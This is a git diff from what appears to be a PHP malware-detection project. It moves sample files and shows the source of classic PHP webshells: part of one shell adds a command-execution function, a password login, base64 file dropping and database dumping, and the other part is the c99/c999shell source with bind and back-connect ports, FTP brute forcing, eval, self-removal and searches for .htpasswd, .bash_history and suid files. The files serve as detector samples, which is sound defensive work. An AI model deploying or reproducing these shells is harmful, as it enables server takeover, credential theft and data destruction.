+                $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+                for($i = $from; $i <= $to; $i++) {
+                        $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+                }
+                $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+                $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+        }
+        return $multipage;
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+        <style type="text/css">
+        input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+        </style>
+        <form method="POST" action="">
+        <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+        <input type="hidden" name="action" value="login">
+        <input type="submit" value="Login">
+        </form>
+<?php
+        exit;
+}//end loginpage()
+
+function execute($cfe) {
+        $res = '';
+        if ($cfe) {
+                if(function_exists('system')) {
+                        @ob_start();
+                        @system($cfe);
+                        $res = @ob_get_contents();
+                        @ob_end_clean();
+                } elseif(function_exists('passthru')) {
+                        @ob_start();
+                        @passthru($cfe);
+                        $res = @ob_get_contents();
+                        @ob_end_clean();
+                } elseif(function_exists('shell_exec')) {
+                        $res = @shell_exec($cfe);
+                } elseif(function_exists('exec')) {
+                        @exec($cfe,$res);
+                        $res = join("\n",$res);
+                } elseif(@is_resource($f = @popen($cfe,"r"))) {
+                        $res = '';
+                        while(!@feof($f)) {
+                                $res .= @fread($f,1024); 
+                        }
+                        @pclose($f);
+                }
+        }
+        return $res;
+}
+function which($pr) {
+        $path = execute("which $pr");
+        return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+        if($fp=@fopen($fname,'w')) {
+                @fputs($fp,@base64_decode($text));
+                @fclose($fp);
+        }
+}
+function dirsize($dir) { 
+        $dh = @opendir($dir);
+        $size = 0;
+        while($file = @readdir($dh)) {
+                if ($file != '.' && $file != '..') {
+                        $path = $dir.'/'.$file;
+                        $size += @is_dir($path) ? dirsize($path) : @filesize($path);
+                }
+        }
+        @closedir($dh);
+        return $size;
+}
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+        global $starttime;
+        $mtime = explode(' ', microtime());
+        $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+        echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//Á¬½ÓMYSQLÊý¾Ý¿â
+function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+        global $charsetdb;
+        @ini_set('mysql.connect_timeout', 5);
+        if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+                p('<h2>Can not connect to MySQL server</h2>');
+                exit;
+        }
+        if($link && $dbname) {
+                if (!@mysql_select_db($dbname, $link)) {
+                        p('<h2>Database selected has error</h2>');
+                        exit;
+                }
+        }
+        if($link && mysql_get_server_info() > '4.1') {
+                if($charset && in_array(strtolower($charset), $charsetdb)) {
+                        q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+                }
+        }
+        return $link;
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+        if (is_array($array)) {
+                foreach ($array as $k => $v) {
+                        $array[$k] = s_array($v);
+                }
+        } else if (is_string($array)) {
+                $array = stripslashes($array);
+        }
+        return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+        $content = htmlspecialchars($content);
+        $content = str_replace("\n", "<br />", $content);
+        $content = str_replace("  ", "&nbsp;&nbsp;", $content);
+        $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+        return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($filepath){
+        return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+        $mode = @fileperms($filepath);
+        if (($mode & 0xC000) === 0xC000) {$type = 's';}
+        elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+        elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+        elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+        elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+        elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+        elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+        else {$type = '?';}
+
+        $owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+        $owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+        $owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+        $group['read'] = ($mode & 00040) ? 'r' : '-'; 
+        $group['write'] = ($mode & 00020) ? 'w' : '-'; 
+        $group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+        $world['read'] = ($mode & 00004) ? 'r' : '-'; 
+        $world['write'] = ($mode & 00002) ? 'w' : '-'; 
+        $world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+        if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+        if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+        if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+        return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)     {
+        if (function_exists('posix_getpwuid')) {
+                $array = @posix_getpwuid(@fileowner($filepath));
+                if ($array && is_array($array)) {
+                        return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+                }
+        }
+        return '';
+}
+
+// ɾ³ýĿ¼
+function deltree($deldir) {
+        $mydir=@dir($deldir);   
+        while($file=$mydir->read())     {               
+                if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+                        @chmod($deldir.'/'.$file,0777);
+                        deltree($deldir.'/'.$file); 
+                }
+                if (is_file($deldir.'/'.$file)) {
+                        @chmod($deldir.'/'.$file,0777);
+                        @unlink($deldir.'/'.$file);
+                }
+        } 
+        $mydir->close(); 
+        @chmod($deldir,0777);
+        return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+        global $bgc;
+        return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+function getPath($scriptpath, $nowpath) {
+        if ($nowpath == '.') {
+                $nowpath = $scriptpath;
+        }
+        $nowpath = str_replace('\\', '/', $nowpath);
+        $nowpath = str_replace('//', '/', $nowpath);
+        if (substr($nowpath, -1) != '/') {
+                $nowpath = $nowpath.'/';
+        }
+        return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($nowpath) {
+        $pathdb = explode('/', $nowpath);
+        $num = count($pathdb);
+        if ($num > 2) {
+                unset($pathdb[$num-1],$pathdb[$num-2]);
+        }
+        $uppath = implode('/', $pathdb).'/';
+        $uppath = str_replace('//', '/', $uppath);
+        return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+        $result = get_cfg_var($varname);
+        if ($result == 0) {
+                return 'No';
+        } elseif ($result == 1) {
+                return 'Yes';
+        } else {
+                return $result;
+        }
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+        return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+// »ñµÃÎļþÀ©Õ¹Ãû
+function getext($file) {
+        $info = pathinfo($file);
+        return $info['extension'];
+}
+
+function GetWDirList($dir){
+        global $dirdata,$j,$nowpath;
+        !$j && $j=1;
+        if ($dh = opendir($dir)) {
+                while ($file = readdir($dh)) {
+                        $f=str_replace('//','/',$dir.'/'.$file);
+                        if($file!='.' && $file!='..' && is_dir($f)){
+                                if (is_writable($f)) {
+                                        $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+                                        $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+                                        $dirdata[$j]['dirchmod']=getChmod($f);
+                                        $dirdata[$j]['dirperm']=getPerms($f);
+                                        $dirdata[$j]['dirlink']=$dir;
+                                        $dirdata[$j]['server_link']=$f;
+                                        $j++;
+                                }
+                                GetWDirList($f);
+                        }
+                }
+                closedir($dh);
+                clearstatcache();
+                return $dirdata;
+        } else {
+                return array();
+        }
+}
+
+function GetWFileList($dir){
+        global $filedata,$j,$nowpath, $writabledb;
+        !$j && $j=1;
+        if ($dh = opendir($dir)) {
+                while ($file = readdir($dh)) {
+                        $ext = getext($file);
+                        $f=str_replace('//','/',$dir.'/'.$file);
+                        if($file!='.' && $file!='..' && is_dir($f)){
+                                GetWFileList($f);
+                        } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+                                if (is_writable($f)) {
+                                        $filedata[$j]['filename']=str_replace($nowpath,'',$f);
+                                        $filedata[$j]['size']=sizecount(@filesize($f));
+                                        $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+                                        $filedata[$j]['filechmod']=getChmod($f);
+                                        $filedata[$j]['fileperm']=getPerms($f);
+                                        $filedata[$j]['fileowner']=getUser($f);
+                                        $filedata[$j]['dirlink']=$dir;
+                                        $filedata[$j]['server_link']=$f;
+                                        $j++;
+                                }
+                        }
+                }
+                closedir($dh);
+                clearstatcache();
+                return $filedata;
+        } else {
+                return array();
+        }
+}
+
+function GetSFileList($dir, $content, $re = 0) {
+        global $filedata,$j,$nowpath, $writabledb;
+        !$j && $j=1;
+        if ($dh = opendir($dir)) {
+                while ($file = readdir($dh)) {
+                        $ext = getext($file);
+                        $f=str_replace('//','/',$dir.'/'.$file);
+                        if($file!='.' && $file!='..' && is_dir($f)){
+                                GetSFileList($f, $content, $re = 0);
+                        } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+                                $find = 0;
+                                if ($re) {
+                                        if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
+                                                $find = 1;
+                                        }
+                                } else {
+                                        if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
+                                                $find = 1;
+                                        }
+                                }
+                                if ($find) {
+                                        $filedata[$j]['filename']=str_replace($nowpath,'',$f);
+                                        $filedata[$j]['size']=sizecount(@filesize($f));
+                                        $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+                                        $filedata[$j]['filechmod']=getChmod($f);
+                                        $filedata[$j]['fileperm']=getPerms($f);
+                                        $filedata[$j]['fileowner']=getUser($f);
+                                        $filedata[$j]['dirlink']=$dir;
+                                        $filedata[$j]['server_link']=$f;
+                                        $j++;
+                                }
+                        }
+                }
+                closedir($dh);
+                clearstatcache();
+                return $filedata;
+        } else {
+                return array();
+        }
+}
+
+function qy($sql) { 
+        global $mysqllink;
+        //echo $sql.'<br>';
+        $res = $error = '';
+        if(!$res = @mysql_query($sql,$mysqllink)) { 
+                return 0;
+        } else if(is_resource($res)) {
+                return 1; 
+        } else {
+                return 2;
+        }       
+        return 0;
+}
+
+function q($sql) { 
+        global $mysqllink;
+        return @mysql_query($sql,$mysqllink);
+}
+
+function fr($qy){
+        mysql_free_result($qy);
+}
+
+function sizecount($fileSize) {
+        $size = sprintf("%u", $fileSize);
+        if($size == 0) {
+                return '0 Bytes' ;
+        }
+        $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
+        return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
+}
+// ±¸·ÝÊý¾Ý¿â
+function sqldumptable($table, $fp=0) {
+        global $mysqllink;
+
+        $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
+        $res = q("SHOW CREATE TABLE $table");
+        $create = mysql_fetch_row($res);
+        $tabledump .= $create[1].";\n\n";
+
+        if ($fp) {
+                fwrite($fp,$tabledump);
+        } else {
+                echo $tabledump;
+        }
+        $tabledump = '';
+        $rows = q("SELECT * FROM $table");
+        while ($row = mysql_fetch_assoc($rows)) {
+                foreach($row as $k=>$v) {
+                        $row[$k] = "'".@mysql_real_escape_string($v)."'";
+                }
+                $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
+                if ($fp) {
+                        fwrite($fp,$tabledump);
+                } else {
+                        echo $tabledump;
+                }
+        }
+        fwrite($fp,"\n\n");
+        fr($rows);
+}
+
+function p($str){
+        echo $str."\n";
+}
+
+function tbhead() {
+        p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+        p('</table>');
+}
+
+function makehide($name,$value=''){
+        p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+        $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+        $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+        !$arg['type'] && $arg['type'] = 'text';
+        $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+        $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+        if ($arg['newline']) {
+                p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+        } else {
+                p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+        }
+}
+
+function makeselect($arg = array()){
+        if ($arg['onchange']) {
+                $onchange = 'onchange="'.$arg['onchange'].'"';
+        }
+        $arg['title'] = $arg['title'] ? $arg['title'] : '';
+        if ($arg['newline']) p('<p>');
+        p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+                if (is_array($arg['option'])) {
+                        if ($arg['nokey']) {
+                                foreach ($arg['option'] as $value) {
+                                        if ($arg['selected']==$value) {
+                                                p("<option value=\"$value\" selected>$value</option>");
+                                        } else {
+                                                p("<option value=\"$value\">$value</option>");
+                                        }
+                                }
+                        } else {
+                                foreach ($arg['option'] as $key=>$value) {
+                                        if ($arg['selected']==$key) {
+                                                p("<option value=\"$key\" selected>$value</option>");
+                                        } else {
+                                                p("<option value=\"$key\">$value</option>");
+                                        }
+                                }
+                        }
+                }
+        p("</select>");
+        if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+        global $self;
+        !$arg['method'] && $arg['method'] = 'post';
+        !$arg['action'] && $arg['action'] = $self;
+        $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+        !$arg['name'] && $arg['name'] = 'form1';
+        p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+        if ($arg['title']) {
+                p('<h2>'.$arg['title'].' &raquo;</h2>');
+        }
+}
+        
+function maketext($arg = array()){
+        !$arg['cols'] && $arg['cols'] = 100;
+        !$arg['rows'] && $arg['rows'] = 25;
+        $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+        p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+        !$name && $name = 'submit';
+        p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+        p('</form>');
+}
+
+function goback(){
+        global $self, $nowpath;
+        p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+        p('</form>');
+}
+
+function encode_pass($pass) {
+        $pass = md5('angel'.$pass);
+        $pass = md5($pass.'angel');
+        $pass = md5('angel'.$pass.'angel');
+        return $pass;
+}
+
+function pr($s){
+        echo "<pre>".print_r($s).'</pre>';
+}
+
+?>
diff --git a/php-malware-finder/samples/classic/b374k.php b/data/samples/classic/b374k.php
index a448645..a448645 100644
--- a/php-malware-finder/samples/classic/b374k.php
+++ b/data/samples/classic/b374k.php
diff --git a/php-malware-finder/samples/classic/c100.php b/data/samples/classic/c100.php
index 529d1aa..529d1aa 100644
--- a/php-malware-finder/samples/classic/c100.php
+++ b/data/samples/classic/c100.php
diff --git a/php-malware-finder/samples/classic/c99.php b/data/samples/classic/c99.php
index 7a1ba9f..78884d2 100644
--- a/php-malware-finder/samples/classic/c99.php
+++ b/data/samples/classic/c99.php
@@ -1,3157 +1,3157 @@
-<?php

-//Starting calls

-if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}

-error_reporting(5);

-@ignore_user_abort(TRUE);

-@set_magic_quotes_runtime(0);

-$win = strtolower(substr(PHP_OS,0,3)) == "win";

-define("starttime",getmicrotime());

-if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}

-$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);

-foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

-

-$shver = "1.0 pre-release build #16"; //Current version

-//CONFIGURATION AND SETTINGS

-if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}

-elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}

-else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL

-}

-

-$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

-

-if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

-if (empty($surl))

-{

- $surl = "?".$includestr; //Self url

-}

-$surl = htmlspecialchars($surl);

-

-$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

-

-//Authentication

-$login = ""; //login

-//DON'T FORGOT ABOUT PASSWORD!!!

-$pass = ""; //password

-$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

-

-$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")

-$login_txt = "Restricted area"; //http-auth message.

-$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";

-

-$gzipencode = TRUE; //Encode with gzip?

-

-$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

-

-$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server

-$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server

-

-$filestealth = TRUE; //if TRUE, don't change modify- and access-time

-

-$donated_html = "<center><b>Owned by hacker</b></center>";

-/* If you publish free shell and you wish

-add link to your site or any other information,

-put here your html. */

-$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

-

-$curdir = "./"; //start folder

-//$curdir = getenv("DOCUMENT_ROOT");

-$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)

-$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

-

-$log_email = "user@host.tld"; //Default e-mail for sending logs

-

-$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending

-$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

-

-// Registered file-types.

-//  array(

-//   "{action1}"=>array("ext1","ext2","ext3",...),

-//   "{action2}"=>array("ext4","ext5","ext6",...),

-//   ...

-//  )

-$ftypes  = array(

- "html"=>array("html","htm","shtml"),

- "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),

- "exe"=>array("sh","install","bat","cmd"),

- "ini"=>array("ini","inf"),

- "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),

- "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),

- "sdb"=>array("sdb"),

- "phpsess"=>array("sess"),

- "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")

-);

-

-// Registered executable file-types.

-//  array(

-//   string "command{i}"=>array("ext1","ext2","ext3",...),

-//   ...

-//  )

-//   {command}: %f% = filename

-$exeftypes  = array(

- getenv("PHPRC")." -q %f%" => array("php","php3","php4"),

- "perl %f%" => array("pl","cgi")

-);

-

-/* Highlighted files.

-  array(

-   i=>array({regexp},{type},{opentag},{closetag},{break})

-   ...

-  )

-  string {regexp} - regular exp.

-  int {type}:

-0 - files and folders (as default),

-1 - files only, 2 - folders only

-  string {opentag} - open html-tag, e.g. "<b>" (default)

-  string {closetag} - close html-tag, e.g. "</b>" (default)

-  bool {break} - if TRUE and found match then break

-*/

-$regxp_highlight  = array(

-  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example

-  array("config.php",1) // example

-);

-

-$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.

- // array (i=>{letter} ...); string {letter} - letter of a drive

-//$safemode_diskettes = range("a","z");

-$hexdump_lines = 8;// lines in hex preview file

-$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

-

-$nixpwdperpage = 100; // Get first N lines from /etc/passwd

-

-$bindport_pass = "c999";  // default password for binding

-$bindport_port = "31373"; // default port for binding

-$bc_port = "31373"; // default port for back-connect

-$datapipe_localport = "8081"; // default port for datapipe

-

-// Command-aliases

-if (!$win)

-{

- $cmdaliases = array(

-  array("-----------------------------------------------------------", "ls -la"),

-  array("find all suid files", "find / -type f -perm -04000 -ls"),

-  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),

-  array("find all sgid files", "find / -type f -perm -02000 -ls"),

-  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),

-  array("find config.inc.php files", "find / -type f -name config.inc.php"),

-  array("find config* files", "find / -type f -name \"config*\""),

-  array("find config* files in current dir", "find . -type f -name \"config*\""),

-  array("find all writable folders and files", "find / -perm -2 -ls"),

-  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),

-  array("find all service.pwd files", "find / -type f -name service.pwd"),

-  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),

-  array("find all .htpasswd files", "find / -type f -name .htpasswd"),

-  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),

-  array("find all .bash_history files", "find / -type f -name .bash_history"),

-  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),

-  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),

-  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),

-  array("list file attributes on a Linux second extended file system", "lsattr -va"),

-  array("show opened ports", "netstat -an | grep -i listen")

- );

-}

-else

-{

- $cmdaliases = array(

-  array("-----------------------------------------------------------", "dir"),

-  array("show opened ports", "netstat -an")

- );

-}

-

-$sess_cookie = "c999shvars"; // Cookie-variable name

-

-$usefsbuff = TRUE; //Buffer-function

-$copy_unset = FALSE; //Remove copied files from buffer after pasting

-

-//Quick launch

-$quicklaunch = array(

- array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),

- array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),

- array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),

- array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),

- array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),

- array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),

- array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),

- array("<b>Encoder</b>",$surl."act=encoder&d=%d"),

- array("<b>Tools</b>",$surl."act=tools&d=%d"),

- array("<b>Proc.</b>",$surl."act=processes&d=%d"),

- array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),

- array("<b>Sec.</b>",$surl."act=security&d=%d"),

- array("<b>SQL</b>",$surl."act=sql&d=%d"),

- array("<b>PHP-code</b>",$surl."act=eval&d=%d"),

- array("<b>Update</b>",$surl."act=update&d=%d"),

- array("<b>Feedback</b>",$surl."act=feedback&d=%d"),

- array("<b>Self remove</b>",$surl."act=selfremove"),

- array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")

-);

-

-//Highlight-code colors

-$highlight_background = "#c0c0c0";

-$highlight_bg = "#FFFFFF";

-$highlight_comment = "#6A6A6A";

-$highlight_default = "#0000BB";

-$highlight_html = "#1300FF";

-$highlight_keyword = "#007700";

-$highlight_string = "#000000";

-

-@$f = $_REQUEST["f"];

-@extract($_REQUEST["c999shcook"]);

-

-//END CONFIGURATION

-

-

-// \/Next code isn't for editing\/

-@set_time_limit(0);

-$tmp = array();

-foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}

-$s = "!^(".implode("|",$tmp).")$!i";

-if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc999shell\">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

-if (!empty($login))

-{

- if (empty($md5_pass)) {$md5_pass = md5($pass);}

- if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))

- {

-  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}

-  header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");

-  header("HTTP/1.0 401 Unauthorized");

-  exit($accessdeniedmess);

- }

-}

-if ($act != "img")

-{

-$lastdir = realpath(".");

-chdir($curdir);

-if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}

-$sess_data = unserialize($_COOKIE["$sess_cookie"]);

-if (!is_array($sess_data)) {$sess_data = array();}

-if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}

-if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

-

-$disablefunc = @ini_get("disable_functions");

-if (!empty($disablefunc))

-{

- $disablefunc = str_replace(" ","",$disablefunc);

- $disablefunc = explode(",",$disablefunc);

-}

-

-if (!function_exists("c999_buff_prepare"))

-{

-function c999_buff_prepare()

-{

- global $sess_data;

- global $act;

- foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}

- foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}

- $sess_data["copy"] = array_unique($sess_data["copy"]);

- $sess_data["cut"] = array_unique($sess_data["cut"]);

- sort($sess_data["copy"]);

- sort($sess_data["cut"]);

- if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}

- else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}

-}

-}

-c999_buff_prepare();

-if (!function_exists("c999_sess_put"))

-{

-function c999_sess_put($data)

-{

- global $sess_cookie;

- global $sess_data;

- c999_buff_prepare();

- $sess_data = $data;

- $data = serialize($data);

- setcookie($sess_cookie,$data);

-}

-}

-foreach (array("sort","sql_sort") as $v)

-{

- if (!empty($_GET[$v])) {$$v = $_GET[$v];}

- if (!empty($_POST[$v])) {$$v = $_POST[$v];}

-}

-if ($sort_save)

-{

- if (!empty($sort)) {setcookie("sort",$sort);}

- if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}

-}

-if (!function_exists("str2mini"))

-{

-function str2mini($content,$len)

-{

- if (strlen($content) > $len)

- {

-  $len = ceil($len/2) - 2;

-  return substr($content, 0,$len)."...".substr($content,-$len);

- }

- else {return $content;}

-}

-}

-if (!function_exists("view_size"))

-{

-function view_size($size)

-{

- if (!is_numeric($size)) {return FALSE;}

- else

- {

-  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

-  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

